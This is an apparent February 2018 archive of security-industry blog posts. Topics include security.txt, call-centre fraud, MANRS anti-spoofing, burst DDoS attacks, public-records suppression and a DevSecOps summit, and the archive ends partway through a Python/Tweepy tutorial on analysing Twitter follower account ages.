Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of the #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.


Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that they are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Implement “security.txt” to advocate responsible vuln. disclosures


After discussing the CAA record in DNS for whitelisting your certificate authorities in my previous article, consider this: it's only a matter of time before someone finds an issue with your web presence, website or any front-facing application. If they do, what do you expect them to do? Keep it under wraps, or disclose it to you "responsibly"? This article is for you if you advocate responsible disclosure; if not, you need to catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can reach you via bug-bounty channels, your info@example email (not recommended) or social media, or they may struggle to find a secure channel at all. But what if you had a way to broadcast your "security channel" details to ease their communication and provide them with a well-documented, managed conversation channel? Isn't that cool? Voila: what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?" But where would you host this page - under contact-us, security, information, about-us, etc.? This is the very issue that security.txt evangelists are trying to solve: standardizing the file, its path and its presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in its early stages[1], but it is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, publishing the file clearly signals that you take security seriously and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or security issue with your website or application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As security.txt follows a standard, here are some points to consider:

  • The file security.txt has to be placed in the .well-known directory under your domain root, i.e. example.com/.well-known/security.txt
  • It documents the following fields,
    • Comments: The file can contain optional comments; each comment line must begin with the # symbol.
    • Each field must be defined on its own line.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: mailto:security@example.com
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect researchers to encrypt their communication with you. It MUST NOT be the key itself, but a URI pointing to the key file.
    • Signature: If you want to show the file's integrity, you can use this directive to link to a signature of the file. The signature file must be named security.txt.sig and must also be accessible at the /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This directive can be used to acknowledge previous researchers and their findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then this is the place to post.

A reference security.txt extracted from Google,

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs
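
If you want to check whether a site (your own, or one you are researching) already publishes a security.txt, a few lines of Python are enough. Below is a minimal sketch that assumes the requests library is installed and uses example.com as a placeholder domain; the parsing is deliberately simple, so treat it as a starting point rather than a full validator.

import requests

# Minimal sketch: fetch a domain's security.txt from the well-known path and list its fields.
def fetch_security_txt(domain):
    url = "https://{}/.well-known/security.txt".format(domain)
    response = requests.get(url, timeout=10)
    if response.status_code != 200:
        return None
    return response.text

def parse_fields(body):
    fields = []
    for line in body.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):  # skip blank lines and comments
            continue
        if ":" in line:
            name, _, value = line.partition(":")
            fields.append((name.strip(), value.strip()))
    return fields

if __name__ == "__main__":
    body = fetch_security_txt("example.com")  # placeholder domain
    if body is None:
        print("No security.txt found")
    else:
        for name, value in parse_fields(body):
            print(name + ": " + value)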

Hope this article gives you an idea of how to implement a security.txt file, and why it is important.

Stay safe!


  1. Early draft posted for RFC review: https://tools.ietf.org/html/draft-foudil-securitytxt-03 ↩︎

  2. Google security.txt file: https://www.google.com/.well-known/security.txt ↩︎

  3. Uniform Resource Identifier: https://tools.ietf.org/html/rfc3986 ↩︎

Authenticating Customers & Identifying Fraudsters

By Ann-Marie Stagg, Chief Executive of the Call Centre Management Association

The world is becoming increasingly intertwined with technology, creating challenges for call centre authentication processes. As we dive into the era of machine learning, artificial intelligence, and deep learning, our authentication solutions should evolve too. The connected world is sparking the end of KBAs – knowledge-based authentication questions – which have been identified as the most common authentication solution.

Earlier this month, during the Phone Fraud Insurance Sector Workshop held in the UK, the CCMA facilitated a questionnaire outlining current authentication tactics, information gained through the phone channel, enterprise priorities in regard to fraud, and more.

When asked about current authentication procedures, 100% of those surveyed said they currently authenticate customers via KBA, asking three or more questions.

 

However, the rise in readily available data found online or through the black market allows fraudsters to easily navigate KBA within the phone channel. Additionally, these questions negatively impact the overall customer experience, due to the extra time they take and the ease with which fraudsters pass them. According to Gartner, 10-30% of customers are not able to remember their own KBA answers and cannot successfully authenticate the first time.

The majority of respondents stated they are experiencing a fairly stable rate of customers contacting their enterprises via the phone channel, making authentication within the call centre an ongoing priority. Once a caller is authenticated, respondents allow various actions to be undertaken over the phone – meaning that a spoofed and undetected fraudster would gain equal access to the same customer information.

These shocking statistics tell us that fraudsters are typically able to authenticate more successfully than our legitimate customers. The exposed call centre is enabling more fraud than most organisations anticipate, as it impacts not only the phone channel but becomes an omnichannel problem. According to Shirley Inscoe of Aite Group, 61% of cross-channel fraud originates in the call centre. From false claims to phishing, fraudsters attempt to maneuver around security measures in an effort to gain financially.

The online channel was identified as the top priority for fraud prevention, with the phone channel in second place and the branch channel in third. Regardless of the channel involved, attendees identified their organisations' top priorities around fraud, which entail both visible and hidden costs.

Fraudsters are able to easily bypass KBAs and other legacy solutions by taking advantage of readily available personal identifying information found via social media or the black market. Additionally, KBAs often extend call times, offering a less than positive customer experience. Enterprises are faced with the challenge of striking a balance between preventing fraud and ensuring a positive customer experience.

According to the overall survey results, enterprises do not fully understand the impact fraud is having on their phone channels. It is clear that legacy authentication solutions do not provide the level of security necessary to protect the call centre and unified commerce while also delivering a frictionless customer experience. If your top priorities are superior customer service and prevention of fraud loss, the question then becomes: how will you solve for both?

Contact us for more information.

The post Authenticating Customers & Identifying Fraudsters appeared first on Pindrop.

Minding Your MANRS

Maintaining the resilience and stability of the global Internet requires collaborative efforts between Internet Service Providers (ISPs), government agencies, enterprises, security vendors and end users. Towards that end, The Internet Society recently published a report titled, The Internet Society 2018 Action Plan, in which it proposes several initiatives, one of which is to strengthen the global Internet routing system. In tandem with its Action Plan, The Internet Society also supports a best practice initiative that was created by members of the network operator community: the Mutually Agreed Norms for Routing Security (MANRS) initiative (formerly known as the Routing Resilience Manifesto).

The MANRS initiative is a commitment by network operators around the globe to “clean their part of the street” and improve the security of the global routing system. Some ISPs already have agreed (see list here) to adopt the MANRS practices. They are implementing at least the baseline security efforts defined by MANRS Actions:

  • Filtering – Ensure the correctness of your own announcements and of announcements from your customers to adjacent networks with prefix and AS-path granularity
  • Anti-spoofing – Enable source address validation for at least single-homed stub customer networks, your own end-users, and infrastructure (see the sketch after this list)
  • Coordination – Maintain globally accessible up-to-date contact information
  • Global Validation – Publish your data, so others can validate routing information on a global scale
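
To make the anti-spoofing action above a little more concrete, here is a conceptual Python sketch of source address validation for a single-homed stub customer: only traffic whose source address falls within the prefixes assigned to that customer should be forwarded. The prefixes and addresses are illustrative placeholders, and in practice this check is implemented in the router itself (uRPF or ACLs) rather than in application code; the sketch simply uses Python 3's standard ipaddress module to show the idea.

import ipaddress

# Prefixes assigned to a hypothetical single-homed stub customer (placeholders)
CUSTOMER_PREFIXES = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("2001:db8:100::/48"),
]

def source_is_valid(src_ip):
    # A packet's source address must belong to one of the customer's assigned prefixes
    addr = ipaddress.ip_address(src_ip)
    return any(addr in prefix for prefix in CUSTOMER_PREFIXES)

if __name__ == "__main__":
    for src in ["192.0.2.10", "198.51.100.7"]:
        verdict = "forward" if source_is_valid(src) else "drop (spoofed source)"
        print(src + " -> " + verdict)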

The Internet Society provides support in the form of hosting the MANRS web site, providing email lists and the participation of Internet Society staff. “During 2018, we expect to increase the rate at which networks join MANRS, and to make significant progress towards achieving a critical mass of participating network operators and Internet Exchange Points (IXPs). Through outreach to organizations, enterprises, and industry groups, we aim to reach a tipping point where operators see MANRS compliance as a strategic business advantage.”

MANRS is on a very similar mission to what we have seen the National Cyber Security Centre promote in the United Kingdom to help make the UK Internet safer. The part that specifically relates to reducing distributed denial of service (DDoS) attacks is the source address anti-spoofing guidance, which aims to reduce attackers' ability to leverage open reflectors (Domain Name System, Network Time Protocol, etc.) on the Internet to send amplified DDoS attack streams to their targets. We have already seen a drop in the use of some reflection techniques, notably fewer NTP amplification DDoS attacks, but much of that may also be attributed to the fact that several vulnerabilities in NTP were patched in mid-2016.

Most of the MANRS guidance is a set of best practices for service providers. The recommendations are good, but they fall into the same category as "IoT devices should have good password security." That is, the MANRS guidance is desirable for any individual provider, but it is unrealistic to think it will solve the global spoofing problem – many IoT botnets can attack without spoofing, for example. There have been decades of sensible progress to help make the Internet more secure, but there is no end in sight for DDoS, because the bad guys continue to innovate ahead of the curve (for example, by taking control of IoT devices to form zombie botnet armies). This is not the first time that anti-spoofing best practices have been recommended: the most well-known anti-spoofing guidance is BCP 38, which has been around for almost two decades. Despite BCP 38, DDoS attacks not only still exist, but have grown in scale and frequency!

It is certainly a good step in the right direction for ISPs, to reduce the possibilities of abuse of critical Internet services like DNS and NTP, but organizations that rely on the Internet for business shouldn’t think that this will be the end of DDoS attacks. We have already seen the massive rise of botnet sourced DDoS attacks—mainly comprised of IoT devices—and these MANRS activities will do little to reduce or stop those types of attacks. Real-time automated DDoS protection remains the only solution to these problems.

For more information, contact us.

Bursts, Waves and DDoS: What You Need to Know

A recent Cisco report found that 42 percent of organizations experienced “burst” distributed denial of service (DDoS) attacks in 2017. Burst attacks, otherwise known as pulse-wave attacks, are gaining favor among hackers because they enable perpetrators to attack multiple targets, one after another, with short, high-volume traffic bursts in a rapidly repeating cycle. Corero’s DDoS research suggests that a likely reason for the “bursting” observed in pulsed DDoS attacks is the timesharing, or multiplexing, of attack botnets, probably between two or more simultaneous targets of a DDoS-for-hire booter/stresser service. The hackers make more money by harnessing the power of one large botnet to serve more than one customer simultaneously. Once a botnet is up and running, they can hit one target with a burst, then switch quickly to hit another target with a burst, then alternate between the targets.

This points to the increasing sophistication of hackers, in terms of their ability to better leverage large botnets and develop mechanisms to evade detection. With short burst attacks, hackers can ramp up the attack traffic faster and increase the chances of evading legacy protection on a network. These short-duration burst attacks can also deliver more calculated, non-saturating traffic volumes, rather than relying on traditional massive brute-force attacks. Such surgical attacks are often crafted specifically to fly under the radar of conventional DDoS protection, as they can blend in with regular traffic volumes. In a kind of sleight of hand, while the target organization focuses on the ramifications of the DDoS attack, other attacks are launched to infiltrate the network and carry out activities such as exfiltrating valuable data.

Burst/pulse-wave attacks are of little concern for Corero customers because the SmartWall® Threat Defense System effectively mitigates such attacks – automatically, near-instantaneously and surgically – just as it would any other multi-vector attack. Whether or not the bursts saturate the links, the SmartWall TDS handles them, blocking the attack traffic during each burst while letting good traffic through, then immediately recovering between bursts so that all good traffic passes as volumes return to normal levels.

The comprehensive attack visibility provided by SmartWall TDS enables these burst/pulse attacks to be easily identified, and additional mitigation techniques can be employed if the bursts are large enough that good traffic is unduly impacted. By looking at attack trends over longer time periods, SmartWall can be configured to automatically switch to an upstream cloud mitigation service, regardless of the short-term oscillations, while continuing to block the attack traffic in the interim. If the cloud service routes traffic directly back to the on-premises solution too soon, this is not an issue: SmartWall TDS automatically re-engages local mitigation and the upstream redirect process starts over again.

With legacy solutions there is typically a significant delay before volumetric DDoS mitigation engages. If attacks "start" and "end" in a periodic way, there is an increased risk that enough of the attack gets through to cause the intended impact on the target.

In the end, organizations should not underestimate burst/pulse attacks, because these well-managed, botnet-sourced DDoS attacks can be many times more damaging. Any business that relies on service continuity and integrity to serve its customers should take steps to prevent such attacks.

For more information, contact us.

The TENTH Annual Disaster Recovery Breakfast: Are You F’ing Kidding Me?


What was the famous Bill Gates quote? “We always overestimate the change that will occur in the next two years and underestimate the change that will occur in the next ten.” Well, we at Securosis actually can gauge that accurately given this is the TENTH annual RSA Conference Disaster Recovery Breakfast.

I think pretty much everything has changed over the past 10 years. Except that stupid users still click on things they shouldn’t. And auditors still give you a hard time about stuff that doesn’t matter. And breaches still happen. But we aren’t fighting for budget or attention much anymore. If anything, they beat a path to your door. So there’s that. It’s definitely a “be careful what you wish for” situation. We wanted to be taken seriously. But probably not this seriously.

We at Securosis are actually more excited for the next 10 years, and having been front and center on this cloud thing we believe over the next decade the status quo of both security and operations will be fundamentally disrupted. And speaking of disruption, we’ll also be previewing our new company – DisruptOPS – at breakfast, if you are interested.

We remain grateful that so many of our friends, clients, and colleagues enjoy a couple hours away from the insanity that is the RSAC. By Thursday it’s very nice to have a place to kick back, have some quiet conversations, and grab a nice breakfast. Or don’t talk to anyone at all and embrace your introvert – we get that too.

The DRB happens only because of the support of CHEN PR, LaunchTech, CyberEdge Group, and our media partner Security Boulevard. Please make sure to say hello and thank them for helping support your recovery.

As always the breakfast will be Thursday morning (April 19) from 8-11 at Jillian’s in the Metreon. It’s an open door – come and leave as you want. We will have food, beverages, and assorted non-prescription recovery items to ease your day. Yes, the bar will be open. You know how Mike likes the hair of the dog.

Please remember what the DR Breakfast is all about. No spin, no magicians (since booth babes were outlawed) and no plastic lightsabers (much to Rich’s disappointment) – it’s just a quiet place to relax and have muddled conversations with folks you know, or maybe even go out on a limb and meet someone new. We are confident you will enjoy the DRB as much as we do.

To help us estimate numbers, please RSVP to rsvp (at) securosis (dot) com.

- Mike Rothman

How corporations suppress disclosure of public records about themselves


Transparency advocate Gary Ruskin wanted to know how the powerful food and agrochemical industries influence public universities and their research.

His small public interest consumer health watchdog organization, US Right to Know, started investigating the connections between the industries, their allies, and taxpayer-funded universities. Public records are a crucial tool Ruskin uses frequently to uncover the details of the university interactions with agrochemical companies.

“My hunch was that: in the interactions between universities and the agrochemical industry and its front groups, there would be industry secrets and there would be news, and there would be things that consumers and citizens should know. So, I filed the FOIAs, and then more FOIAs, and in the end I was right -- more than I could have imagined,” Ruskin told Freedom of the Press Foundation.

His numerous public records requests have produced documents that have exposed relationships between universities and companies like Monsanto, but the agrochemical industry is fighting to keep these ties secret.  

These requests include three filed with the University of Florida for communications between university employees and people associated with food pesticide companies. Ruskin received some, but not all, of the documents he asked for, in his requests for communications between the university and companies like Monsanto, so he filed a lawsuit against the University of Florida alleging violation of Florida’s Sunshine Law.

A retired University of Oklahoma professor who serves on the board of directors of an organization with ties to Monsanto, Drew Kershen, has intervened in the lawsuit. He argued in his motion for summary judgment, which was later denied, that the release of the documents requested, which include internal agrochemical industry email discussions, would violate his privacy.

Kershen filed a discovery request on January 17, 2018 to interrogate Ruskin about why the Yahoo! group emails should be considered public record, and why he filed the records requests in the first place.

In his response, Ruskin objected to many of Kershen’s questions, which included “describe the type of knowledge the Requested Records were intended to perpetuate, communicate, or formalize” and “Why are you seeking the Requested Documents from the University of Florida?” Ruskin’s attorney says that under Florida law, no one needs a reason to request public documents, and the subjects of the information being requested don’t have to do anything in particular to make the records eligible for disclosure. She thinks it’s unlikely the judge will require him to answer these questions.  

Michael Morisy, cofounder of government transparency website Muckrock, which helps automate public records requests, says this line of questioning is deeply concerning when judges take it seriously. “Under most states laws, if it’s open to you it’s open to everyone and it doesn’t matter why the requester wants the documents. Basis for release isn’t what your motivation is for asking for it. It would be very unusual for requesters to be forced to explain why.”

The emails that Ruskin did receive were illuminating. In them, Kershen urges other members of a Yahoo! email list used for internal industry discussion to resist Ruskin’s lawful records requests.

“I urge resisting disclosure as much as possible because USRTK is on a strategy to acquire as may emails as possible,” Kershen wrote in emails to the Yahoo! email group for internal industry discussion that were released through Ruskin’s public records requests. “Of course, USRTK will also be combing those released emails to create a negative narrative about each of us in a vast conspiracy of a secret cabal.”

US Right to Know has investigated Kershen’s organization, the Genetic Literacy Project, in the past, and has published information about its financial ties to agricultural engineering companies including Monsanto and Syngenta. (Kershen did not respond to a request by Freedom of the Press Foundation for comment.)

This isn’t the first time Ruskin’s public records requests have sparked opposition from the agrochemical industry. Documents produced through his requests formed the basis of a 2015 front page New York Times article that detailed how Monsanto enlisted academics to oppose the labeling of genetically engineered foods. In response, Kevin Folta, a University of Florida professor, sued the New York Times and journalist Eric Lipton for defamation in 2017.

Folta even filed a broad subpoena against Ruskin and two other US Right to Know employees to testify in the lawsuit and produce documents, including their communications with the Times. Ruskin says that the request essentially demanded that the nonprofit produce over 100,000 documents for this subpoena alone. Folta finally withdrew the order after Ruskin’s legal representation filed a motion to quash the subpoena.

Revealing the details of relationships between government agencies and private entities is a critical use of the federal Freedom of Information Act and state-level public records acts. Yet, as these instances exemplify, private parties are increasingly deploying a variety of tactics to prevent the disclosure of newsworthy documents about themselves.

Powerful corporations resisting disclosure of public records is not unique to the agrochemical industry or to Florida. Multinational corporation Landis+Gyr sued a public records requester and transparency website MuckRock in 2016 after the City of Seattle released records about the city’s new smart meter power grid. The company obtained a court order for MuckRock to de-publish the documents that was ultimately overturned, and even demanded MuckRock help identify readers who may have seen the documents — a potentially massive privacy violation.

Bus manufacturing company New Flyer sued Metro last May to block the release of the details of its $500 million contract with the agency. When a journalist in Texas requested traffic projections for a toll road project built by a private company, the company sued to block the release.

Facebook has demanded that officials give it at least three days’ notice before responding to any public records requests involving the company. In some cases, it has even asked cities to send it a copy of the records request before officials respond. Facebook and other companies, including Amazon, have also used code names to shield their identities and hide their interactions with government agencies from the public.

Advance notice of public records requests could allow Facebook to initiate a “reverse FOIA”, in which a company tries to block the release of records about itself by bringing requesters to court. It could also allow companies to determine what stories journalists are pursuing and build a strategy to delay or halt unfavorable coverage.

Gary Ruskin worries that the opposition to his public records requests will deter future journalists or organizations, especially those with fewer resources, from critically investigating corporate wrongdoing.

“If we win the University of Florida FOIA lawsuit, and get newsworthy documents, will any journalists write about them? Will they write, knowing that that even if they write an article that is fair and accurate [...], they may get sued for defamation?”

To Ruskin, the agrochemical industry’s resistance to US Right to Know’s investigative work only reaffirms that it has information to hide. He thinks that information about the food we eat and the pesticides we consume is in the public interest, and he won’t stop fighting to bring corporate influence over scientific institutions to light.

Filing public records requests makes government activities public — inherently an act of journalism. Attempts by corporations and industries to block the release of public records about themselves are a threat to press freedom, whether they are deployed against newspapers, veteran journalists, or citizens. The public has the right to know what government agencies are doing with their taxpayer dollars, and contractor compliance with laws can only be assured when this information is disclosed.


What Executives Will Get Out of our DevSecOps Virtual Summit

Our economy is almost entirely digitized. Modern businesses rely on software to run their day-to-day operations, and, as such, innovation must meet the demands of an ever-evolving market. However, business leaders are at a crossroads when it comes to securing their digital assets. As organizations migrate towards development practices like DevOps, the need to produce software faster becomes as much of a liability as a competitive advantage if left unchecked. If business leaders want to evolve beyond DevOps into DevSecOps, there are cultural, technological, and procedural implications that need to be considered. Get a handle on this shift and what it means for you by attending our Virtual Summit, Assembling the Pieces of the DevSecOps Puzzle, on February 28. Executives will get practical tips and advice on their role in a DevSecOps world, including:

How to Empower Your Developers to Be the Standard Bearers for DevSecOps

Change often comes from the top. In order to inspire your developers to code securely, you’ll need to make sure they feel empowered to do so. CA Veracode’s own VP of Engineering, Maria Loughlin, will speak directly from her own experiences as a development leader on what inspires developers to not only code for features and function, but for security as well. Maria will discuss how business leaders can guide their developers towards secure coding education outside the office and how aligning development goals with security can foster a culture of secure coding across the entire development community. Furthermore, she will touch upon how to bridge organizational gaps between the security and development teams to ensure that everyone is speaking the same language.

Shifting Security Tools and How It Can Save Your Bottom Line

We live in an era where security can actually be considered a competitive advantage. However, that advantage can only be fully realized when security is integrated into the software development lifecycle. CA Veracode’s 2017 State of Software Security report found that developers who scan code earlier and more often in the development process fix 48 percent more flaws. This is not by accident. Tim Jarrett, Director of Product Strategy at CA Veracode, will discuss how business leaders can provide the resources to make security invisible to their developers by integrating into developer tools like IDEs, ticketing, bug tracking and build systems. Tim will discuss how investing in security up front can maintain your speed-to-market and drastically save on remediation costs later on.

The Shifting Roles of the Security Team and What DevSecOps Means for Them

It may be time to rethink how we hire AppSec professionals. By 2019, 2 million cybersecurity jobs will be open, and openings on your own cybersecurity team will be among them. Since developers are the ones producing code and creating the innovations that fuel our digital economy, shouldn’t they be included in the solution to integrate security into development? Chris Wysopal, Co-Founder and CTO of CA Veracode, will discuss what these paradigm shifts mean for security professionals and how you, as a business leader, can make sure you are putting the right resources in place to manage your application security program.

The Winter Virtual Summit 2018 is coming on February 28. Get all the Summit details here. Ready to sign up? Reserve your seat today.

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query and returns up to 5000 ids, which can be saved for later use (since both screen_name and name can be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(user_ids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug
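
Note that a single followers_ids() call only returns the most recent page of ids (up to 5000), which is why the examples later in this post cover each account’s last 5000 followers. If you need the complete follower list of a larger account, Tweepy’s Cursor can walk through the pages for you; something along these lines should work, subject to Twitter’s rate limits (the api argument is an authenticated tweepy.API object like the auth_api created in the script below):

from tweepy import Cursor

# Sketch: collect every follower id for a target account, one page (up to 5000 ids) at a time.
# Construct the API object with wait_on_rate_limit=True if you expect to fetch many pages.
def get_all_follower_ids(api, target):
    ids = []
    for page in Cursor(api.followers_ids, screen_name=target).pages():
        ids += page
    return ids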

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with io.open(filename, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        try:
            with io.open(filename, "r", encoding="utf-8") as f:
                ret = json.load(f)
        except:
            pass
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    load_fn = None
    save_fn = None
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
    else:
        # Note: load_bin/save_bin are not defined in this script; only .json filenames are used here.
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.search(match_expression, time_string)
    if match is not None:
        first_bit = match.group(1)
        second_bit = match.group(2)
        last_bit = match.group(3)
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / 100
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("\r")
        sys.stdout.flush()
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        sys.stdout.flush()
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
                    labels[label].append(entry) 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    consumer_key=""
    consumer_secret=""
    access_token=""
    access_token_secret=""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print
        print("\t\tFollower age ranges")
        print("\t\t===================")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print("\t\tMost common friends counts")
        print("\t\t==========================")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump


Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:


Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

